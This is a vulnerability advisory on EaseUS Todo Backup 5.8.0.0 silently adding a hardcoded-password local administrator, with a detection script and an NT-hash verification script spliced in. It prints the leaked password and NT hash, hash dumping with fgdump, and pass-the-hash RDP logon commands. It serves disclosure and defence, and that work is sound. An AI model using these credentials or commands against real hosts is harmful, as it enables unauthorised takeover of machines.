EaseUS Todo Backup 5.8.0.0 Hardcoded Password

2014.03.21
Credit: AkaStep
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

Vulnerable Software:
========================================
EaseUS Todo Backup 5.8.0.0 (build 20130321)
http://oi62.tinypic.com/108i4ut.jpg
========================================
Vuln: Hardcoded administrative password / potential backdoor.
========================================
Impact:
An attacker exploiting this vulnerability could assume greater privileges on a compromised system, allowing them to potentially destroy data or take control of computers for malicious purposes.
========================================
About software:
Designed for small and medium-sized businesses. Simplify backup & recovery management to minimize server downtime and ensure business continuity.
========================================
Vuln details:
EaseUS Todo Backup 5.8.0.0 (build 20130321) (other versions may also be affected, but were not tested), when installed on a machine, silently creates a local account ("ETB User") that is a member of the local Administrators group and has a hardcoded password. Because the password is identical on every installation and has already leaked, the account can be abused by remote attackers as well as local ones: anyone who knows the password (or its NT hash) can completely compromise the target machine.

Here are a few proof-of-concept demonstrations:

*Before installation ("net user" command on target machine)*

C:\Users\Administrator>NET USER

User accounts for \\WIN-CE1QUVOKT1H

---------------------------------------------------------------------------
Administrator            Guest
The command completed successfully.

*After installation completes (notice: we have a new local administrative account, created silently!)*

C:\Users\Administrator>NET USER

User accounts for \\WIN-CE1QUVOKT1H

---------------------------------------------------------------------------
Administrator            ETB User                 Guest
The command completed successfully.
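The two "net user" listings above are the whole detection signal: a local account that was not there before the installer ran and that now sits in Administrators. The script below is an added example, not code from the advisory or from EaseUS. It parses the text printed by "net user" and "net user <name>" (as captured from a host, e.g. with "net user > users.txt") and flags enabled accounts that are absent from a pre-install baseline and belong to the local Administrators group. The embedded sample outputs are constructed to mirror the advisory's host; the "BackupOp" account in them is invented to show that a non-admin addition is not flagged, and the baseline set is assumed from the pre-install listing.

```python
"""Detect a silently added local administrator from `net user` output.

Added example (not from the advisory). Parses the text printed by
`net user` and `net user "<name>"`, then flags enabled accounts that are
absent from a pre-install baseline and belong to local Administrators.
"""
import re

# Accounts present before the installer ran (taken from the advisory's first listing).
BASELINE = {"Administrator", "Guest"}

# Constructed sample of `net user` after installation. "BackupOp" is an invented
# extra account used to show that a non-admin addition is not flagged.
NET_USER_LISTING = """\
User accounts for \\\\WIN-CE1QUVOKT1H

-------------------------------------------------------------------------------
Administrator            BackupOp                 ETB User
Guest
The command completed successfully.
"""

# Constructed (abridged) `net user "<name>"` output for each non-baseline account.
NET_USER_DETAIL = {
    "ETB User": """\
User name                    ETB User
Full Name                    ETB User
Comment                      For EaseUS Todo Backup Central Management Cons
User's comment
Account active               Yes
Password expires             Never

Local Group Memberships      *Administrators
Global Group memberships     *None
The command completed successfully.
""",
    "BackupOp": """\
User name                    BackupOp
Account active               Yes
Local Group Memberships      *Backup Operators     *Users
Global Group memberships     *None
The command completed successfully.
""",
}


def parse_net_user_listing(text):
    """Return account names from the table `net user` prints (columns split on 2+ spaces)."""
    names, in_table = [], False
    for line in text.splitlines():
        if line.startswith("----"):
            in_table = True
        elif line.startswith("The command completed"):
            break
        elif in_table and line.strip():
            names.extend(re.split(r"\s{2,}", line.strip()))
    return names


def parse_net_user_detail(text):
    """Parse the key/value lines of `net user "<name>"`; indented lines continue the previous key."""
    info, key = {}, None
    for line in text.splitlines():
        if not line.strip() or line.startswith("The command completed"):
            continue
        m = re.match(r"^(\S.*?)(?:\s{2,}(.*))?$", line)
        if m:
            key = m.group(1)
            info[key] = (m.group(2) or "").strip()
        elif key:
            info[key] += "  " + line.strip()
    return info


def local_groups(info):
    """Group names from 'Local Group Memberships' (each prefixed with '*')."""
    value = info.get("Local Group Memberships", "")
    return [g.lstrip("*") for g in re.split(r"\s{2,}", value) if g.startswith("*")]


def find_unexpected_admins(listing_text, detail_lookup, baseline=BASELINE):
    """Names of enabled accounts outside `baseline` that are members of Administrators."""
    findings = []
    for name in parse_net_user_listing(listing_text):
        if name in baseline:
            continue
        info = parse_net_user_detail(detail_lookup(name))
        if info.get("Account active") == "Yes" and "Administrators" in local_groups(info):
            findings.append(name)
    return findings


if __name__ == "__main__":
    for name in find_unexpected_admins(NET_USER_LISTING, NET_USER_DETAIL.__getitem__):
        print(f"unexpected local administrator: {name!r}")
```

On a real host, replace the `detail_lookup` callable with one that runs `net user "<name>"` (or pass captured output) and treat any hit as an account to disable and re-password before investigating how it got there.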
C:\Users\Administrator>control userpasswords2

C:\Users\Administrator>cd Desktop

C:\Users\Administrator\Desktop>fgdump.exe
fgDump 2.1.0 - fizzgig and the mighty group at foofus.net
Written to make j0m0kun's life just a bit easier
Copyright(C) 2008 fizzgig and foofus.net

fgdump comes with ABSOLUTELY NO WARRANTY! This is free software, and you
are welcome to redistribute it under certain conditions; see the COPYING and
README files for more information.

No parameters specified, doing a local dump. Specify -? if you are looking for help.
--- Session ID: 2014-03-22-05-13-53 ---
Starting dump on 127.0.0.1

** Beginning local dump **
OS (127.0.0.1): Microsoft Windows Unknown Server (Build 9600) (64-bit)
Passwords dumped successfully
Cache dumped successfully

-----Summary-----

Failed servers:
NONE

Successful servers:
127.0.0.1

Total failed: 0
Total successful: 1

C:\Users\Administrator\Desktop>net user

User accounts for \\WIN-CE1QUVOKT1H

---------------------------------------------------------------------------
Administrator            ETB User                 Guest
The command completed successfully.

C:\Users\Administrator\Desktop>net user "ETB User"
User name                    ETB User
Full Name                    ETB User
Comment                      For EaseUS Todo Backup Central Management Cons
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            3/21/2014 10:12:52 PM
Password expires             Never
Password changeable          3/21/2014 10:12:52 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Administrators
Global Group memberships     *None
The command completed successfully.
C:\Users\Administrator\Desktop>type 127.0.0.1.pwdump
---------- SNIP ----------------
ETB User:1001:NO PASSWORD*********************:DE0F2B9AAEDF6BF59FED68AB06C334C2:
---------- SNIP ----------------

This hardcoded administrative password has already leaked in the wild:

Pass: ~1EaseUs@AcsT
http://forum.insidepro.com/viewtopic.php?t=8677&start=420&sid=ed953995a5aa360b9c5be3f1472328d6

Trying to log on to this account:

Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
win-ce1quvokt1h\etb user

C:\Windows\system32>whoami /all

USER INFORMATION
----------------

User Name                SID
======================== =============================================
win-ce1quvokt1h\etb user S-1-5-21-140604893-3061859077-1642753036-1001


GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes
============================================================= ================ ============ ==================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Group used for deny only
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Group used for deny only
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                                      Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                                                 Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                                         Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

C:\Windows\system32>exit

Note that the token shown is the UAC-filtered, medium-integrity token of an interactive logon: BUILTIN\Administrators appears as "Group used for deny only" until the session elevates through the consent prompt, which the known password makes trivial.

Testing the lovely pass-the-hash technique; the result is successful against Server 2012 R2:

[blackhat@localhost FreeRDP]$ xfreerdp -u "ETB User" -p DE0F2B9AAEDF6BF59FED68AB06C334C2 192.168.1.103
WARNING: Using deprecated command-line interface!
-p ****** -> /p:******
-u ETB User -> /u:ETB User
192.168.1.103 -> /v:192.168.1.103
connected to 192.168.1.103:3389
Closed from X11

PIC 1: http://oi58.tinypic.com/2z8b7t4.jpg

Or using the valid, hardcoded and now publicly known credentials:

[blackhat@localhost ~]$ rdesktop -u "ETB User" -p ~1EaseUs@AcsT 192.168.1.103
Autoselected keyboard map en-us
Connection established using SSL.
WARNING: Remote desktop does not support colour depth 24; falling back to 16

PIC 2: http://oi60.tinypic.com/2j459pk.jpg

=====================
WITH LOVE FROM AZERBAIJAN
========================
packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com itsecuritysolutions.org waraxe.us exploit-db.com insecurety.net millikuvvetler.net b3yaz.org

Special respects to CAMOUFL4G3 && ottoman38 and to all Azerbaijan black hats, Aa team && to all Turkish hackers.

/AkaStep
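To tie the pwdump line and the leaked password above together: an NT hash is MD4 over the UTF-16LE encoding of the password, so whoever holds the dumped hash can either pass it directly (as the xfreerdp run above does) or check a candidate password against it offline. The script below is an added example, not part of the advisory; it implements MD4 per RFC 1320 in pure Python (hashlib's md4 needs OpenSSL's legacy provider on OpenSSL 3 builds, so it is not relied on), parses the advisory's pwdump line, and reports whether the quoted password reproduces the dumped hash. The pwdump line and password are the ones quoted in the advisory; the RFC test vectors and the NT hash of "password" are the checks for the implementation itself.

```python
"""Recompute the NT hash of a candidate password and compare it with a pwdump line.

Added example, not part of the advisory. NT hash = MD4(UTF-16LE(password)).
MD4 is implemented directly from RFC 1320 so the script runs without
OpenSSL's legacy provider.
"""
import struct

_MASK = 0xFFFFFFFF


def _rotl(x, s):
    x &= _MASK
    return ((x << s) | (x >> (32 - s))) & _MASK


# Message-word order for rounds 2 and 3 (RFC 1320, section 3.4).
_R2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
_R3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)


def md4(data: bytes) -> bytes:
    """MD4 digest (RFC 1320) of `data`."""
    msg = bytearray(data)
    bit_len = (len(data) * 8) & 0xFFFFFFFFFFFFFFFF
    msg.append(0x80)                      # pad: 1 bit, zeros to 56 mod 64, then 64-bit LE length
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", bit_len)

    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(48):
            if i < 16:        # round 1: F = (b AND c) OR (NOT b AND d)
                f, k, s, t = (b & c) | (~b & d), i, (3, 7, 11, 19)[i % 4], 0
            elif i < 32:      # round 2: G = majority(b, c, d), constant sqrt(2)
                f, k, s, t = (b & c) | (b & d) | (c & d), _R2[i - 16], (3, 5, 9, 13)[i % 4], 0x5A827999
            else:             # round 3: H = b XOR c XOR d, constant sqrt(3)
                f, k, s, t = b ^ c ^ d, _R3[i - 32], (3, 9, 11, 15)[i % 4], 0x6ED9EBA1
            # One register is updated per step; rotating the tuple reproduces the RFC's A,D,C,B order.
            a, b, c, d = d, _rotl(a + f + x[k] + t, s), b, c
        a, b, c, d = (a + aa) & _MASK, (b + bb) & _MASK, (c + cc) & _MASK, (d + dd) & _MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT (NTLM) hash of `password`: MD4 over its UTF-16LE encoding, lowercase hex."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump_line(line: str):
    """Split a pwdump record 'user:rid:lmhash:nthash:...' into (user, rid, lm, nt)."""
    user, rid, lm, nt = line.split(":")[:4]
    return user, int(rid), lm, nt.lower()


# Quoted from the advisory: the fgdump record for the account and the password it reports as leaked.
PWDUMP_LINE = "ETB User:1001:NO PASSWORD*********************:DE0F2B9AAEDF6BF59FED68AB06C334C2:"
LEAKED_PASSWORD = "~1EaseUs@AcsT"


def password_matches_dump(password: str = LEAKED_PASSWORD, line: str = PWDUMP_LINE) -> bool:
    """True when the NT hash of `password` equals the NT field of the pwdump record."""
    return nt_hash(password) == parse_pwdump_line(line)[3]


if __name__ == "__main__":
    user, rid, _, nt = parse_pwdump_line(PWDUMP_LINE)
    print(f"{user} (RID {rid}) NT hash in dump: {nt}")
    print(f"NT hash of candidate password:   {nt_hash(LEAKED_PASSWORD)}")
    print("match:", password_matches_dump())
```

The same `nt_hash` function is what a defender needs to confirm, from a hash alone, that a vendor-created account on a fleet of hosts still carries the published password: compute the hash once and compare it against each host's dump, with no need to attempt a logon.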

References:

http://oi62.tinypic.com/108i4ut.jpg
http://oi58.tinypic.com/2z8b7t4.jpg


Copyright 2019, cxsecurity.com